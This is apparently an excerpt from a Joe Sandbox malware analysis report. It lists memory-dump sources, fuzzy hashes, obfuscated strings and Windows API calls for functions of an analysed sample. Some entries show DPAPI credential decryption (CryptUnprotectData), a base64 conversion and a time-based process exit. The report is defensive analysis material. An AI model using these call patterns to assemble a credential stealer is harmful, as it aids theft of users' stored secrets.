                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: g~$(_=$4,^[$<Y}$?V~$BAoF$l5B$s/s
                                    • API String ID: 0-3092103552
                                    • Opcode ID: c8a76406ecd9a2f11e15246ce87a5d7b5b9590d0dab3ab93e3deb9b5ce02e737
                                    • Instruction ID: 5de06cf4197fb77f6513cc73078d7af39ef052c9cf2237d59bdb5dd9e8afd8e1
                                    • Opcode Fuzzy Hash: c8a76406ecd9a2f11e15246ce87a5d7b5b9590d0dab3ab93e3deb9b5ce02e737
                                    • Instruction Fuzzy Hash: 5FB2E8F3A0C6049FE304AE2DEC8567ABBE5EF94320F16893DE6C4C7744E63598058796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $-$0$0$1$8$9$@
                                    • API String ID: 0-3654031807
                                    • Opcode ID: d9f5a783ac69c99476d0bd188282678eb3d0e20889cc8b405eb6f50c6cf1f6a9
                                    • Instruction ID: 512c6275944aba2dce9975039fb5f97430a8503be1e1e1f2693d34c58bf0309d
                                    • Opcode Fuzzy Hash: d9f5a783ac69c99476d0bd188282678eb3d0e20889cc8b405eb6f50c6cf1f6a9
                                    • Instruction Fuzzy Hash: F062BE7150C3458FE721CF29C09079EBBF2AF86358F184E0DE4E54BA91D3359885CBAA
                                    APIs
                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C6E8A4B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: ~qgl
                                    • API String ID: 2221118986-2435832519
                                    • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                    • Instruction ID: ccd676033fa14efb58b84d1ecbe4bdd4162506bda8df82a94812d5ca6784a583
                                    • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                    • Instruction Fuzzy Hash: B2B10B72E0521ACFDB14CF68CC907D9B7B2EF89314F1902AAC549DB791E7309989CB94
                                    APIs
                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C6E88F0
                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6E925C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: ~qgl
                                    • API String ID: 2221118986-2435832519
                                    • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                    • Instruction ID: 179cccb7540f13821518fde36926f7931901db4a7b2938a7be728f08da44b098
                                    • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                    • Instruction Fuzzy Hash: 43B1D772E0920ACFDB14CF58CC816DDB7B2EF89314F15026AC949DB795D730A989CB94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Yc $9p{m$B<s$U]{W$Hq$IU
                                    • API String ID: 0-2530018767
                                    • Opcode ID: ac63babdceedc8be3a6ca488605bb38fb88f7d69f3b295d7dd0a5280e1ce8bc0
                                    • Instruction ID: a2709cb00e39766d150105fa0a4e1c1bd8d0f76a6fa85668cbba422c0c10d804
                                    • Opcode Fuzzy Hash: ac63babdceedc8be3a6ca488605bb38fb88f7d69f3b295d7dd0a5280e1ce8bc0
                                    • Instruction Fuzzy Hash: 9CA206F360C2049FE7046E2DEC8567AFBE9EF94320F1A493DEAC4C7744EA3558058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 9W$\SOd$`r{;$`r{;$~kKh
                                    • API String ID: 0-2303421948
                                    • Opcode ID: 6600fad681203d1d422c795ad4c206f4d10dc0d6845f4431c5771c77383238e9
                                    • Instruction ID: 73f5513e39cff75bb20fcdd891721cccbcee286a760ce2304e56c7d0bf9a827f
                                    • Opcode Fuzzy Hash: 6600fad681203d1d422c795ad4c206f4d10dc0d6845f4431c5771c77383238e9
                                    • Instruction Fuzzy Hash: BAB22BF360C2049FE704AE2DEC8567ABBE9EF94720F16493DEAC4C7744E63598058792
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 0019640C
                                    • sscanf.NTDLL ref: 00196439
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00196452
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00196460
                                    • ExitProcess.KERNEL32 ref: 0019647A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 7b1c6cbb6fbedf0e74326c87fd599aa876504742c101c181360b3858052519b8
                                    • Instruction ID: 5c636470f9c0391496c227865c03d73849acfbb693e79ed9a9b4edd37e3bc04b
                                    • Opcode Fuzzy Hash: 7b1c6cbb6fbedf0e74326c87fd599aa876504742c101c181360b3858052519b8
                                    • Instruction Fuzzy Hash: B321ABB5D14209AFCF05EFE4D945AEEB7B9BF48300F04856AE506E3250EB345609CB69
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0018728D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00187294
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001872C1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001872E4
                                    • LocalFree.KERNEL32(?), ref: 001872EE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 940837d8994da2caed6f5c70468005eb3e4decde00c250c64dec51be4fc54f7e
                                    • Instruction ID: 3a0095cc02379c281ebc78769a73d044fdb3b8eb0b6e38ae1e6ed9ab49695e0e
                                    • Opcode Fuzzy Hash: 940837d8994da2caed6f5c70468005eb3e4decde00c250c64dec51be4fc54f7e
                                    • Instruction Fuzzy Hash: B8010C75A44208BBDB15DBE4CD46FAE7778BB48B04F204144FB06AB2C0D6B0AA009BA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !q}#$Qg>?$o@pn$r>$XK_
                                    • API String ID: 0-872119339
                                    • Opcode ID: a679fd45d18dd9827f09e29f74625b9b41f875ef0c82bfd56b63d809d29ad767
                                    • Instruction ID: 7f312aff608e40de5b6a65b5628544fe79faab886d73cf4e8cfb1e31388f47a2
                                    • Opcode Fuzzy Hash: a679fd45d18dd9827f09e29f74625b9b41f875ef0c82bfd56b63d809d29ad767
                                    • Instruction Fuzzy Hash: 7B527CF3A0C7149FD3046E2DEC8566BFBE9EF94220F1A463DEAC4C7740E53598018692
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Q+v7$V/3$`{$1W_
                                    • API String ID: 0-3578315516
                                    • Opcode ID: 9b79b1fa47b57549df84cb480a5e0d43b74d0c2435afc232c1d13d69fa17833d
                                    • Instruction ID: cb269e6e63c076454e1243f44ba00d7c3e940d0cb849566cc513d037be9c317b
                                    • Opcode Fuzzy Hash: 9b79b1fa47b57549df84cb480a5e0d43b74d0c2435afc232c1d13d69fa17833d
                                    • Instruction Fuzzy Hash: B4B215F360C2049FE3086E29EC8567ABBE5EF94320F1A493DE6C5C7744EA3598058697
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,001851D4,40000001,00000000,00000000), ref: 00198960
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: febb8963f8ed7365ef382d27a18efafba76879b03213e27f5eaeea4bab14cc04
                                    • Instruction ID: 83e973b18418c797139813ecb431c614f23582d3b1209fa0643cefa8089d24b7
                                    • Opcode Fuzzy Hash: febb8963f8ed7365ef382d27a18efafba76879b03213e27f5eaeea4bab14cc04
                                    • Instruction Fuzzy Hash: 191100B5210209BFDF04CFA4D884FBB37A9AF8A718F109548F9098B250DB76EC41CB61
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B3F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 00189B51
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B7A
                                    • LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 00189B8F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
